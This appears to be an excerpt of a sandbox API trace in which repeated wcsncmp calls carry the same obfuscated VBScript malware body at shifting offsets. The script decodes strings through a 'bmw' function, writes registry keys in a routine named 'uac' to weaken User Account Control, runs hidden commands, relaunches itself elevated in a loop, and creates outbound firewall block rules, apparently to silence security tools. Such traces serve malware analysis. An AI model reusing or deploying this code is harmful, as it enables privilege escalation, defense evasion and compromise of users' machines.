bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.327] wcsncmp (_String1="nst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.327] wcsncmp (_String1="st NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.327] wcsncmp (_String1="t NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.327] wcsncmp (_String1=" NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 